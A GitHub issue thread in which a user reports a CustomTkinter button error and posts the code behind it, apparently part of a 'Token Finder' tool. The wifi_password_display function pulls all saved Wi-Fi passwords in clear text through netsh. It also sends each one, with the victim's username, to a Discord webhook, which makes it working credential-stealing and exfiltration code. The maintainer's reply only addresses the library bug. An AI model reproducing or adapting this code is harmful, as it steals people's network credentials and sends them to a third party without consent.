### ISSUE TITLE
Error when I click button

### ISSUE THREAD

**Issue by VSPuzzler** [TomSchimansky/CustomTkinter#23]
Here is the function for my main UI:
```
def GUI():
    customtkinter.set_appearance_mode("Dark")
    frame1 = customtkinter.CTkFrame(master=root, width=585, height=385, corner_radius=15)
    frame1.place(x=10,y=10)
    customtkinter.CTkLabel(master=frame1,
                           text="Token Finder",
                           width=120,
                           height=25,
                           corner_radius=8).place(x=250, y=25)
    customtkinter.CTkButton(master=frame1,text = "Discord Token", command=discord_token_displayer).place(x=250, y=80)
    customtkinter.CTkButton(master=frame1, text="Minecraft Token", command=discord_token_displayer).place(x=245, y=130)
    customtkinter.CTkButton(master=frame1, text="Wifi Password", command=wifi_password_display).place(x=250, y=180)
    customtkinter.CTkButton(master=frame1, text="Quit", command=end).place(x=450, y=20)
    root.mainloop()
```
When I click the Wifi Password button, my code errors out. Here is the code for the Wifi Password function:
```
def wifi_password_display():
    global hook
    command_output = subprocess.run(["netsh", "wlan", "show", "profiles"], capture_output=True).stdout.decode()

    profile_names = (re.findall("All User Profile     : (.*)\r", command_output))

    wifi_list = []

    if len(profile_names) != 0:
        for name in profile_names:

            wifi_profile = {}

            profile_info = subprocess.run(["netsh", "wlan", "show", "profile", name],
                                          capture_output=True).stdout.decode()

            if re.search("Security key           : Absent", profile_info):
                continue
            else:

                wifi_profile["ssid"] = name

                profile_info_pass = subprocess.run(["netsh", "wlan", "show", "profile", name, "key=clear"],
                                                   capture_output=True).stdout.decode()

                password = re.search("Key Content            : (.*)\r", profile_info_pass)

                if password == None:
                    wifi_profile["password"] = None
                else:

                    wifi_profile["password"] = password[1]

                wifi_list.append(wifi_profile)
    for widget in root.winfo_children():
        widget.destroy()
    customtkinter.set_appearance_mode("Dark")
    frame1 = customtkinter.CTkFrame(master=root, width=585, height=385, corner_radius=15)
    frame1.place(x=10,y=10)
    customtkinter.CTkLabel(master=frame1,
                           text="Token Finder",
                           width=120,
                           height=25,
                           corner_radius=8).place(x=250, y=25)
    customtkinter.CTkButton(master=frame1,text = "Discord Token", command=discord_token_displayer).place(x=250, y=80)
    customtkinter.CTkButton(master=frame1, text="Minecraft Token", command=discord_token_displayer).place(x=245, y=130)
    customtkinter.CTkButton(master=frame1, text="Wifi Password", command=wifi_password_display).place(x=250, y=180)
    customtkinter.CTkLabel(master=frame1,
                           text="Your wifi passwords:",
                           width=450,
                           height=25,
                           corner_radius=8).place(x=90, y=220)
    customtkinter.CTkButton(master=frame1, text="Quit", command=end).place(x=450, y=20)
    thing1 = 0
    for x in range(len(wifi_list)):
        username = getpass.getuser()
        webhook = DiscordWebhook(url=hook, content=str(wifi_list[x]) + " **"+username+"**")
        webhook.execute()
        customtkinter.CTkLabel(master=frame1,
                               text=wifi_list[x],
                               width=450,
                               height=25,
                               corner_radius=8).place(x=90, y=240+30*thing1)
        thing1 = thing1 + 1
```
I get the following error: 
![image](https://user-images.githubusercontent.com/79369814/147866103-14318051-d3cf-41e8-8fae-13ddb67545e7.png)

**Comment by TomSchimansky** [comment]
Yeah its same error as the last one, for some reason the fix was not in version 1.7 I uploaded yesterday, but now I uploaded version 1.8 and it should be fixed.

**Comment by VSPuzzler** [comment]
Thanks again!
